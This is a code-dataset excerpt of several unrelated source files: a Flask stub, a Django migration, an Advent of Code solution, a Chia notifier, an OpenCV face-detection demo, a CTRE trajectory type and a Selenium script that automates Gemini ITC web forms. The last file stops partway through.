max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
|---|---|---|---|---|---|---|
flask01.py
|
pyporto/flask101
| 0
|
12777651
|
<gh_stars>0
from flask import Flask
app = Flask('myapp')
if __name__ == '__main__':
app.run()
| 1.335938
| 1
|
profiles/migrations/New folder/0035_auto_20201028_0913.py
|
Rxavio/link
| 0
|
12777652
|
# Generated by Django 3.0.3 on 2020-10-28 07:13
from django.db import migrations, models
import profiles.models
class Migration(migrations.Migration):
dependencies = [
('profiles', '0034_auto_20201028_0358'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='image',
field=models.ImageField(default=profiles.models.default_image, upload_to=profiles.models.upload_images_path),
),
]
| 1.484375
| 1
|
2018/day_4/star_1/star.py
|
j-benson/advent-of-code
| 0
|
12777653
|
from datetime import datetime, timedelta
def parse_line(line):
date = datetime.strptime(line[1:17], "%Y-%m-%d %H:%M")
message = line[19:]
return (date, message)
with open('data.txt') as data:
unordered_list = [parse_line(line) for line in data.readlines()]
ordered_list = sorted(unordered_list, key= lambda i : i[0])
guard_log = dict() # guard_id -> ( fell_asleep, woke_up, time_asleep )
guard = None
fell_asleep = None
## Parse the ordered guard sleep log
for log_entry in ordered_list:
timestamp = log_entry[0]
message = log_entry[1]
if message.startswith("Guard"):
guard = message[7:message.index(" ", 7)]
elif message.startswith("falls asleep"):
fell_asleep = timestamp
elif message.startswith("wakes up"):
if fell_asleep == None:
raise Exception("WTF")
time_asleep = timestamp - fell_asleep
sleep_entry = (fell_asleep, timestamp, time_asleep)
if guard in guard_log:
guard_log[guard].append(sleep_entry)
else:
guard_log[guard] = [ sleep_entry ]
fell_asleep = None
## Create a tuple for sorting to find the guard that sleeps the most
total_sleep_time = []
for g_id in guard_log.keys():
total_time = sum([log_entry[2] for log_entry in guard_log[g_id]], timedelta())
total_sleep_time.append((g_id, total_time))
total_sleep_time.sort(reverse=True, key=lambda elem : elem[1])
sleepy_guard_id = total_sleep_time[0][0]
print(sleepy_guard_id)
## Find the sleepy guards most slept minute
sleep_log = guard_log[sleepy_guard_id]
sleep_minute_count = dict()
for i in range(0, 60):
sleep_minute_count[i] = 0
for log_entry in sleep_log: # ( fell_asleep, woke_up, time_asleep )
fell_asleep = log_entry[0]
time_asleep = log_entry[2]
start_sleep_minute = int(fell_asleep.minute)
end_sleep_minute = start_sleep_minute + int(time_asleep.total_seconds() / 60)
for minute in range(start_sleep_minute, end_sleep_minute):
sleep_minute_count[minute] += 1
sleep_minute_count = [(k, sleep_minute_count[k]) for k in sleep_minute_count.keys()]
sleep_minute_count.sort(reverse=True, key=lambda elem : elem[1])
sleepy_minute = sleep_minute_count[0][0]
print(sleepy_minute)
checksum = int(sleepy_guard_id) * sleepy_minute
print(checksum)
| 3.1875
| 3
|
src/notifier/__init__.py
|
guydavis/chiadog
| 2
|
12777654
|
"""Notifier package responsible for user notification
"""
import json
import logging
import re
import time
import traceback
# std
from abc import ABC, abstractmethod
from dataclasses import dataclass
from json_logic import jsonLogic
from typing import List
from enum import Enum
# Ignore Chiadog alerts about being offline due to entire container just launching in the first 30 minutes
MINIMUM_LAUNCH_SECONDS_BEFORE_ALERTING_ABOUT_BEING_OFFLINE = 30 * 60
class EventPriority(Enum):
"""Event priority dictates how urgently
the user needs to be notified about it
"""
LOW = -1
NORMAL = 0
HIGH = 1
class EventType(Enum):
"""Events can either be user events
that are propagated directly to the
user, or keep-alive events that are
processed to ensure the system runs
"""
KEEPALIVE = 0
USER = 1
DAILY_STATS = 2
PLOTDECREASE = 3
PLOTINCREASE = 4
class EventService(Enum):
"""Even service helps to distinguish
between similar events for different services
"""
HARVESTER = 0
FARMER = 1
FULL_NODE = 2
DAILY = 3
WALLET = 4
@dataclass
class Event:
type: EventType
priority: EventPriority
service: EventService
message: str
class Notifier(ABC):
"""This abstract class provides common interface for
any notifier implementation. It should be easy to add
extensions that integrate with variety of services such as
Pushover, E-mail, Slack, WhatsApp, etc
"""
def __init__(self, title_prefix: str, config: dict):
self._program_launch_time = time.time()
self._title_prefix = title_prefix
self._config = config
self._conn_timeout_seconds = 10
self._notification_types = [EventType.USER]
self._notification_services = [EventService.HARVESTER, EventService.FARMER, EventService.FULL_NODE]
daily_stats = config.get("daily_stats", False)
wallet_events = config.get("wallet_events", False)
decreasing_plot_events = config.get("decreasing_plot_events", False)
increasing_plot_events = config.get("increasing_plot_events", False)
if daily_stats:
self._notification_types.append(EventType.DAILY_STATS)
self._notification_services.append(EventService.DAILY)
if wallet_events:
self._notification_services.append(EventService.WALLET)
if decreasing_plot_events:
self._notification_types.append(EventType.PLOTDECREASE)
if increasing_plot_events:
self._notification_types.append(EventType.PLOTINCREASE)
def get_title_for_event(self, event):
icon = ""
if event.priority == EventPriority.HIGH:
icon = "🚨"
elif event.priority == EventPriority.NORMAL:
icon = "⚠️"
elif event.priority == EventPriority.LOW:
icon = "ℹ️"
return f"{icon} {self._title_prefix} {event.service.name}"
def should_ignore_event(self, event):
# Automatically ignore Chiadog's spurious "Your harvester appears to be offline!" alerts immediately after a relaunch of container
# Obviously if the Machinaris container (and thus all farming/harvesting) was just started, there will be a gap in the log...
if (self._program_launch_time + MINIMUM_LAUNCH_SECONDS_BEFORE_ALERTING_ABOUT_BEING_OFFLINE) >= time.time():
if (event.service.name == 'HARVESTER' and event.message.startswith("Your harvester appears to be offline!")) or \
(event.service.name == 'FULL_NODE' and event.message.startswith("Experiencing networking issues?")):
return True
# Next only ignore if user has set an "ignore" clause in config.xml for a particular Notifier
if not "ignore" in self._config:
return False
ignore = self._config["ignore"]
try:
# First check for one of type, priority, service, and message as a simple filter
if 'type' in ignore and ignore['type'] == event.type.name:
return True
if 'priority' in ignore and ignore['priority'] == event.priority.name:
return True
if 'service' in ignore and ignore['service'] == event.service.name:
return True
if 'message' in ignore and re.search(ignore['message'], event.message, re.M|re.I):
return True
# Then look for compound ignore clause to invoke json logic
if 'compound' in ignore:
rule = json.loads(ignore['compound'])
data = {
"type" : event.type.name.lower(),
"priority" : event.priority.name.lower(),
"service" : event.service.name.lower(),
"message" : event.message
}
logging.debug("Rule: {0}".format(json.loads(ignore['compound'])))
logging.debug("Data: {0}".format(data))
result = jsonLogic(rule, data)
logging.debug("Result: {0}".format(result))
return result
except Exception as ex:
logging.error("Ignore config '{0}' error {1}".format(ignore, str(ex)))
traceback.print_exc()
return False
@abstractmethod
def send_events_to_user(self, events: List[Event]) -> bool:
"""Implementation specific to the integration"""
pass
| 2.734375
| 3
|
testHaarCascade.py
|
AriRodriguezCruz/mcfgpr
| 0
|
12777655
|
<reponame>AriRodriguezCruz/mcfgpr
# -*- coding: utf-8 -*-
"""
Basic test of our ability to do a Haar Cascade
"""
import cv2
haarFaceCascade = cv2.CascadeClassifier('haarcascades/haarcascade_frontalface_default.xml')
WINDOW_NAME = "preview"
def detect(img, cascade, minimumFeatureSize=(20,20)):
if cascade.empty():
raise(Exception("There was a problem loading your Haar Cascade xml file."))
#cv2.CascadeClassifier.detectMultiScale(image, rejectLevels, levelWeights[, scaleFactor[, minNeighbors[, flags[, minSize[, maxSize[, outputRejectLevels]]]]]]) -> objects
rects = cascade.detectMultiScale(img, scaleFactor=1.2, minNeighbors=3, minSize=minimumFeatureSize)
if len(rects) == 0:
return []
rects[:,2:] += rects[:,:2] #convert last coord from (width,height) to (maxX, maxY)
return rects
def draw_rects(img, rects, color):
for x1, y1, x2, y2 in rects:
cv2.rectangle(img, (x1, y1), (x2, y2), color, 2)
def handleFrame(frame, allowDebugDisplay=True):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.equalizeHist(gray)
faces = detect(gray,haarFaceCascade)
if allowDebugDisplay:
output = frame
draw_rects(output,faces,(0,255,0)) #BGR format
cv2.imshow(WINDOW_NAME, cv2.resize(output,(0,0), fx=2,fy=2,interpolation=cv2.INTER_NEAREST) )
def main():
previewWindow = cv2.namedWindow(WINDOW_NAME) # open a window to show debugging images
vc = cv2.VideoCapture(0) # Initialize the default camera
if vc.isOpened(): # try to get the first frame
(readSuccessful, frame) = vc.read()
else:
print "Could not open the system camera. Is another instance already running?"
readSuccessful = False
while readSuccessful:
handleFrame(frame, allowDebugDisplay=True)
key = cv2.waitKey(10)
if key == 27: # exit on ESC
# cv2.imwrite( "lastOutput.png", frame) #save the last-displayed image to file, for our report
break
# Get Image from camera
readSuccessful, frame = vc.read()
vc.release() #close the camera
cv2.destroyWindow(WINDOW_NAME) #close the window
if __name__ == "__main__":
main()
| 2.5625
| 3
|
2-aiohttp/aiohttp_server/app/web/config.py
|
rcmgn/kts-school-backend
| 9
|
12777656
|
import typing
from dataclasses import dataclass
import yaml
if typing.TYPE_CHECKING:
from app.web.app import Application
@dataclass
class Config:
username: str
password: str
def setup_config(app: "Application"):
with open("config/config.yaml", "r") as f:
raw_config = yaml.safe_load(f)
app.config = Config(
username=raw_config["credentials"]["username"],
password=raw_config["credentials"]["password"],
)
| 2.5625
| 3
|
ctre/trajectorypoint.py
|
Ninjakow/robotpy-ctre
| 0
|
12777657
|
# validated: 2018-03-01 DS b3d643236ddc libraries/driver/include/ctre/phoenix/Motion/TrajectoryPoint.h
from collections import namedtuple
__all__ = ["TrajectoryPoint"]
#: Motion Profile Trajectory Point for use with pushMotionProfileTrajectory
TrajectoryPoint = namedtuple(
"TrajectoryPoint",
[
"position",
"velocity",
"auxiliaryPos",
"profileSlotSelect0",
"profileSlotSelect1",
"isLastPoint",
"zeroPos",
"timeDur",
],
)
TrajectoryPoint.position.__doc__ = "The position to servo to."
TrajectoryPoint.velocity.__doc__ = "The velocity to feed-forward."
TrajectoryPoint.auxiliaryPos.__doc__ = "The position for auxiliary PID to target."
TrajectoryPoint.profileSlotSelect0.__doc__ = """
Which slot to get PIDF gains.
PID is used for position servo.
F is used as the Kv constant for velocity feed-forward.
Typically this is hardcoded to a particular slot, but you are free to
gain schedule if need be.
Choose from [0,3]
"""
TrajectoryPoint.profileSlotSelect1.__doc__ = """
Which slot to get PIDF gains for auxiliary PID.
This only has impact during MotionProfileArc Control mode.
Choose from [0,1]
"""
TrajectoryPoint.isLastPoint.__doc__ = """
Set to true to signal Talon that this is the final point, so do not
attempt to pop another trajectory point from out of the Talon buffer.
Instead continue processing this way point. Typically the velocity
member variable should be zero so that the motor doesn't spin indefinitely.
"""
TrajectoryPoint.zeroPos.__doc__ = """
Set to true to signal Talon to zero the selected sensor.
When generating MPs, one simple method is to make the first target position zero,
and the final target position the target distance from the current position.
Then when you fire the MP, the current position gets set to zero.
If this is the intent, you can set zeroPos on the first trajectory point.
Otherwise you can leave this false for all points, and offset the positions
of all trajectory points so they are correct.
"""
TrajectoryPoint.timeDur.__doc__ = """
Duration to apply this trajectory pt.
This time unit is ADDED to the existing base time set by
configMotionProfileTrajectoryPeriod().
"""
| 2.671875
| 3
|
ITC_selenium.py
|
bryanmiller/pyitc_gemini
| 0
|
12777658
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
#import difflib
import datetime
import logging
import os
from selenium import webdriver
# from selenium.webdriver.firefox.options import Options
# from selenium import selenium
# from selenium.common.exceptions import TimeoutException
# from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
import sys
# import subprocess
import time
if sys.version_info.major == 2:
from urllib2 import urlopen
reload(sys)
sys.setdefaultencoding('utf8')
elif sys.version_info.major == 3:
from urllib.request import urlopen
# 2014 Mar 10 - Reorganize output, astephens
# 2014 Mar 12 - Ignore URLs (lines with "http") when performing diff
# 2014 Mar 14 - Add CompareDirs
# 2015 Feb 2 - AWS, ignore page-break lines between multiple plots
# 2021 Feb 12 - BWM, code cleanup
sleep = 0.1 # May need to increase on fast computers in headless mode
#---------------------------------------------------------------------------------------------------
def Usage():
print ('')
print ('SYNOPSIS')
cmd = sys.argv[0]
print (' ', cmd[cmd.rfind('/')+1:], 'test/production')
print ('')
print ('DESCRIPTION')
print (' Blah.')
print ('')
print ('OPTIONS')
#print (' -d : debug mode')
print ('')
# raise SystemExit
#---------------------------------------------------------------------------------------------------
def GetURL(Instrument, Testing, site='web'):
url = ''
if Testing:
url = 'http://itcdev.cl.gemini.edu:9080/itc/servlets/web/'
# url = 'http://sbfitcdev1.cl.gemini.edu:9080/itc/servlets/web/'
else:
if site in ['gn', 'gs']:
# Used by ODBs
url = 'http://' + site + 'odb.gemini.edu:8442/itc/servlets/web/'
elif site == 'web':
# Used by ITC web pages
url = 'https://www.gemini.edu/itc/servlets/web/'
else:
print('Site must be either "gn", "gs", or "web".')
return url
if Instrument == 'NIRI':
url += 'ITCniri.html'
elif Instrument == 'F2':
url += 'ITCflamingos2.html'
elif Instrument == 'GMOSN':
url += 'ITCgmos.html'
elif Instrument == 'GMOSS':
url += 'ITCgmosSouth.html'
elif Instrument == 'GNIRS':
url += 'ITCgnirs.html'
elif Instrument == 'NIFS':
url += 'ITCnifs.html'
elif Instrument == 'Michelle':
url += 'ITCmichelle.html'
elif Instrument == 'GSAOI':
url += 'ITCgsaoi.html'
elif Instrument == 'TReCS':
url += 'ITCtrecs.html'
return(url)
#---------------------------------------------------------------------------------------------------
# Get the output path
def GetPath(Instrument, Testing, outdir='/tmp/'):
# path = os.getenv('HOME') + '/tmp/' + Instrument + '/' + str(datetime.date.today())
path = os.getenv('HOME') + outdir
if Testing:
path += '/Test'
else:
path += '/Prod'
return(path)
#---------------------------------------------------------------------------------------------------
def SetLog(instrument, outdir='/tmp'):
path = os.environ['HOME'] + outdir + '/'
logfile = path + '/ITC_' + instrument + '.' + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S") + '.log'
logger = ConfigureLogging(logfile)
#logger = logging.getLogger()
logger.info('Log = %s', logfile)
return(logger)
#---------------------------------------------------------------------------------------------------
def ParseArgs(argv):
logger = logging.getLogger()
Testing = False
if len(argv) != 2:
Usage()
logger.info('Using default (Production URL...)')
else:
if 'test' in argv[1].lower():
Testing = True
logger.info('Using Test URL...')
elif 'prod' in argv[1].lower():
logger.info('Using Production URL...')
else:
Usage()
raise SystemExit
return(Testing)
#---------------------------------------------------------------------------------------------------
# Record the URL in the output directory for future reference
def RecordURL(URL, Instrument, Testing):
path = GetPath(Instrument, Testing)
if not os.path.exists(path):
os.mkdir(path)
URLFile = open(path + '/URL','w')
URLFile.write(URL + '\n')
URLFile.close()
#---------------------------------------------------------------------------------------------------
# Pass a URL that contains the ITC tests
def startWebpage(URL, headless=True):
# Create a new instance of the Firefox driver
# https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Headless_mode
options = webdriver.firefox.options.Options()
if headless:
options.add_argument('-headless')
driver = webdriver.Firefox(executable_path='geckodriver', options=options)
# go to the GMOS ITC Page
driver.get(URL)
return driver
#---------------------------------------------------------------------------------------------------
# Input: Brightness
# Units
def setPointSource(driver, Brightness, Units):
logger = logging.getLogger('setPointSource')
#Select Point Source
driver.find_element_by_xpath("//input[@name='Profile' and @value='POINT']").click()
#Set Point Source Brightness
if type(Brightness) is float:
Brightness = str(Brightness)
logger.debug('Setting Point Source brightness to %s', Brightness)
driver.find_element_by_name("psSourceNorm").clear()
driver.find_element_by_name("psSourceNorm").send_keys(Brightness)
#Set Point Source Units
driver.find_element_by_xpath("//select[@name='psSourceUnits']/option[@value='" + Units + "']").click()
#---------------------------------------------------------------------------------------------------
def setGaussianSource(driver, FullWidth, Brightness, Units):
logger = logging.getLogger('setGaussianSource')
# Turn Fullwidth to str
if type(FullWidth) is float:
FullWidth = str(FullWidth)
# Turn Brightness to str
if type(Brightness) is float:
Brightness = str(Brightness)
logger.debug('Setting Gaussian source with FWHM = %s and brightness = %s %s', FullWidth, Brightness, Units)
# Select Gaussian Source
driver.find_element_by_xpath("//input[@name='Profile' and @value='GAUSSIAN']").click()
# Set Full Width Half Max
driver.find_element_by_name("gaussFwhm").clear()
driver.find_element_by_name("gaussFwhm").send_keys(FullWidth)
# Set Brightness
driver.find_element_by_name("gaussSourceNorm").clear()
driver.find_element_by_name("gaussSourceNorm").send_keys(Brightness)
# Set Brightness Units
driver.find_element_by_xpath("//select[@name='gaussSourceUnits']/option[@value='" + Units + "']").click()
#---------------------------------------------------------------------------------------------------
def setUniformSource(driver, Brightness, Units):
logger = logging.getLogger('setUniformSource')
time.sleep(sleep)
if type(Brightness) is float:
Brightness = str(Brightness)
logger.debug('Setting uniform brightness to %s %s', Brightness, Units)
# Select Uniform Source
driver.find_element_by_xpath("//input[@name='Profile' and @value='UNIFORM']").click()
# Set Brightness
driver.find_element_by_name("usbSourceNorm").clear()
driver.find_element_by_name("usbSourceNorm").send_keys(Brightness)
# Set Brightness Units
driver.find_element_by_xpath("//select[@name='usbSourceUnits']/option[@value='" + Units + "']").click()
#---------------------------------------------------------------------------------------------------
def setBrightnessNormalization(driver, Wavelength):
driver.find_element_by_xpath("""//select[@name='WavebandDefinition']/option[@value=""" + '"' + Wavelength + '"' + """]""").click()
#---------------------------------------------------------------------------------------------------
def setLibrarySpectrum(driver, Type):
#Set for Library Spectrum of a star with specific stellar type
driver.find_element_by_xpath("//input[@value='LIBRARY_STAR' and @name='Distribution']").click()
#Choose stellar type
driver.find_element_by_xpath("//select[@name='stSpectrumType']/option[@value='" + Type + "']").click()
#---------------------------------------------------------------------------------------------------
def setLibrarySpectrumNonStellar(driver, Type):
#Set for Library Spectrum of a non-stellar object
driver.find_element_by_xpath("//input[@value='LIBRARY_NON_STAR' and @name='Distribution']").click()
#Choose non-stellar object
driver.find_element_by_xpath("//select[@name='nsSpectrumType']/option[@value='" + Type + "']").click()
#---------------------------------------------------------------------------------------------------
def setPowerLawSpectrum(driver, Index):
logger = logging.getLogger('setPowerLawSpectrum')
time.sleep(sleep)
if type(Index) is int or type(Index) is float:
Index = str(Index)
logger.debug('Setting power law index to %s', Index)
# Set for Power Law Spectrum
driver.find_element_by_xpath("//input[@value='PLAW' and @name='Distribution']").click()
# Set Index
driver.find_element_by_name("powerIndex").clear()
driver.find_element_by_name("powerIndex").send_keys(Index)
#---------------------------------------------------------------------------------------------------
def setBlackBodySpectrum(driver, Temperature):
logger = logging.getLogger('setBlackBodySpectrum')
time.sleep(sleep)
if type(Temperature) is int or type(Temperature) is float:
Temperature = str(Temperature)
logger.debug('Setting blackbody temperature to %s deg', Temperature)
# Set for BlackBody
driver.find_element_by_xpath("//input[@value='BBODY' and @name='Distribution']").click()
# Set Temperature
driver.find_element_by_name("BBTemp").clear()
driver.find_element_by_name("BBTemp").send_keys(Temperature)
#---------------------------------------------------------------------------------------------------
def setEmissionLine(driver, Wavelength, LineFlux, LineFluxUnits, LineWidth, FluxDensity, FluxDensityUnits):
logger = logging.getLogger('setEmissionLine')
time.sleep(sleep)
# Choose Emission Line
driver.find_element_by_xpath("//input[@value='ELINE' and @name='Distribution']").click()
# Set Wavelength
if type(Wavelength) is float:
Wavelength = str(Wavelength)
logger.debug('Setting emission line wavelength to %s um', Wavelength)
driver.find_element_by_name("lineWavelength").clear()
driver.find_element_by_name("lineWavelength").send_keys(Wavelength)
# Set Line Flux
if type(LineFlux) is float:
LineFlux = str(LineFlux)
logger.debug('Setting emission line flux to %s %s', LineFlux, LineFluxUnits)
driver.find_element_by_name("lineFlux").clear()
driver.find_element_by_name("lineFlux").send_keys(LineFlux)
# Set Line Flux Units
driver.find_element_by_xpath("//select[@name='lineFluxUnits']/option[@value='" + LineFluxUnits + "']")
# Set Line Width
if type(LineWidth) is float:
LineWidth = str(LineWidth)
logger.debug('Setting emission line width to %s', LineWidth)
driver.find_element_by_name("lineWidth").clear()
driver.find_element_by_name("lineWidth").send_keys(LineWidth)
# Set Flux Density
if type(FluxDensity) is float:
FluxDensity = str(FluxDensity)
logger.debug('Setting emission line flux density to %s %s', FluxDensity, FluxDensityUnits)
driver.find_element_by_name("lineContinuum").clear()
driver.find_element_by_name("lineContinuum").send_keys(FluxDensity)
# Set Flux Density Units
driver.find_element_by_xpath("//select[@name='lineContinuumUnits']/option[@value='" + FluxDensityUnits + "']")
#---------------------------------------------------------------------------------------------------
# This is for the OLD GMOS ITC with EEV, Hamamatsu Red and Blue CCDS
def setDetectorPropertiesGMOS(driver, CCD, SpatialBinning, SpectralBinning, Coating, Wavefront):
#Set CCD
if "eev" in CCD.lower():
#Set to EEV array
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='E2V']").click()
elif "red" in CCD.lower():
#Set to Hamamatsu Red
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='HAMAMATSU']").click()
else:
#Set to Hamamatsu Blue
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='HAMAMATSU']").click()
#Set Spatial Binning
if type(SpatialBinning) is int:
SpatialBinning = str(SpatialBinning)
driver.find_element_by_xpath("//input[@name='spatBinning' and @value='" + SpatialBinning + "']").click()
#Set spectral Binning
if type(SpectralBinning) is int:
SpectralBinning = str(SpectralBinning)
driver.find_element_by_xpath("//input[@name='specBinning' and @value='" + SpectralBinning + "']") .click()
#Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
#Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
# Set Detector Properties for GMOS-N
def setDetectorPropertiesGMOSN(driver, CCD, SpatialBinning, SpectralBinning, Coating, Wavefront):
# Set CCD
if "dd" in CCD.lower():
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='E2V']").click()
elif "leg" in CCD.lower():
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='E2V']").click()
elif "ham" in CCD.lower():
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='HAMAMATSU']").click()
# Set Spatial Binning
if type(SpatialBinning) is int:
SpatialBinning = str(SpatialBinning)
driver.find_element_by_xpath("//input[@name='spatBinning' and @value='" + SpatialBinning + "']").click()
# Set spectral Binning
if type(SpectralBinning) is int:
SpectralBinning = str(SpectralBinning)
driver.find_element_by_xpath("//input[@name='specBinning' and @value='" + SpectralBinning + "']") .click()
# Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
# Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
# Set Detector Properties for GMOS-S
def setDetectorPropertiesGMOSS(driver, CCD, SpatialBinning, SpectralBinning, Coating, Wavefront):
# Set CCD
if "eev" in CCD.lower():
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='E2V']").click()
elif "ham" in CCD.lower():
driver.find_element_by_xpath("//input[@name='DetectorManufacturer' and @value='HAMAMATSU']").click()
# Set Spatial Binning
if type(SpatialBinning) is int:
SpatialBinning = str(SpatialBinning)
driver.find_element_by_xpath("//input[@name='spatBinning' and @value='" + SpatialBinning + "']").click()
# Set spectral Binning
if type(SpectralBinning) is int:
SpectralBinning = str(SpectralBinning)
driver.find_element_by_xpath("//input[@name='specBinning' and @value='" + SpectralBinning + "']") .click()
# Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
# Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
# <NAME>, 2013-09-05
def setDetectorPropertiesGSAOI(driver, Noise, Coating, Strehl, StrehlBand):
logger = logging.getLogger('setDetectorPropertiesGSAOI')
# Set Read Noise Level
if "veryfaint" in Noise.lower():
driver.find_element_by_xpath("//input[@value='VERY_FAINT' and @name='ReadMode']").click()
elif "faint" in Noise.lower():
driver.find_element_by_xpath("//input[@value='FAINT' and @name='ReadMode']").click()
else:
driver.find_element_by_xpath("//input[@value='BRIGHT' and @name='ReadMode']").click()
# Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
# Set Strehl
# if type(Strehl) is int or type(Strehl) is float:
# Strehl = str(Strehl)
#
# logger.debug('Setting Strehl to %s', Strehl)
# driver.find_element_by_name("avgStrehl").clear()
# driver.find_element_by_name("avgStrehl").send_keys(Strehl)
#
# # Set Strehl Band
# driver.find_element_by_xpath("//select[@name='strehlBand']/option[@value='" + StrehlBand + "']").click()
#---------------------------------------------------------------------------------------------------
# <NAME>, 2013-09-10
def setDetectorPropertiesF2(driver, Noise, Coating, Port, Wavefront):
#Set Read Noise Level
if "low" in Noise.lower():
driver.find_element_by_xpath("//input[@value='FAINT_OBJECT_SPEC' and @name='ReadMode']").click()
elif "med" in Noise.lower():
driver.find_element_by_xpath("//input[@value='MEDIUM_OBJECT_SPEC' and @name='ReadMode']").click()
else:
driver.find_element_by_xpath("//input[@value='BRIGHT_OBJECT_SPEC' and @name='ReadMode']").click()
#Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
#Set Port
if "side" in Port.lower():
driver.find_element_by_xpath("//input[@value='SIDE_LOOKING' and @name='IssPort']").click()
elif "up" in Port.lower():
driver.find_element_by_xpath("//input[@value='UP_LOOKING' and @name='IssPort']").click()
#Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
def setDetectorPropertiesNIRI(driver, Bias, Noise, Coating, Wavefront):
#Set Detector Bias
if "low" in Bias.lower():
driver.find_element_by_xpath("//input[@value='SHALLOW' and @name='WellDepth']").click()
else:
driver.find_element_by_xpath("//input[@value='DEEP' and @name='WellDepth']").click()
#Set Read Noise Level
if "low" in Bias.lower():
driver.find_element_by_xpath("//input[@value='IMAG_SPEC_NB' and @name='ReadMode']").click()
elif "med" in Bias.lower():
driver.find_element_by_xpath("//input[@value='IMAG_1TO25' and @name='ReadMode']").click()
else:
driver.find_element_by_xpath("//input[@value='IMAG_SPEC_3TO5' and @name='ReadMode']").click()
#Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
#Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
elif "aowfs" in Wavefront.lower() or "altair" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='AOWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
def setDetectorPropertiesNIFS(driver, Read, Coating, Wavefront):
#Set read Mode and Well Depth
if "bright" in Read.lower():
driver.find_element_by_xpath("//input[@value='BRIGHT_OBJECT_SPEC' and @name='ReadMode']").click()
elif "medium" in Read.lower():
driver.find_element_by_xpath("//input[@value='MEDIUM_OBJECT_SPEC' and @name='ReadMode']").click()
elif "faint" in Read.lower():
driver.find_element_by_xpath("//input[@value='FAINT_OBJECT_SPEC' and @name='ReadMode']").click()
#Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
#Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
elif "aowfs" in Wavefront.lower() or "altair" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='AOWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
def setDetectorPropertiesGNIRS(driver, Read, Coating, Wavefront):
#Set read Mode and Well Depth
if "verybright" in Read.lower():
driver.find_element_by_xpath("//input[@value='VERY_BRIGHT' and @name='ReadMode']").click()
elif "bright" in Read.lower():
driver.find_element_by_xpath("//input[@value='BRIGHT' and @name='ReadMode']").click()
elif "faint" in Read.lower():
driver.find_element_by_xpath("//input[@value='FAINT' and @name='ReadMode']").click()
elif "veryfaint" in Read.lower():
driver.find_element_by_xpath("//input[@value='VERY_FAINT' and @name='ReadMode']").click()
#Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
#Set Wavefront Sensor
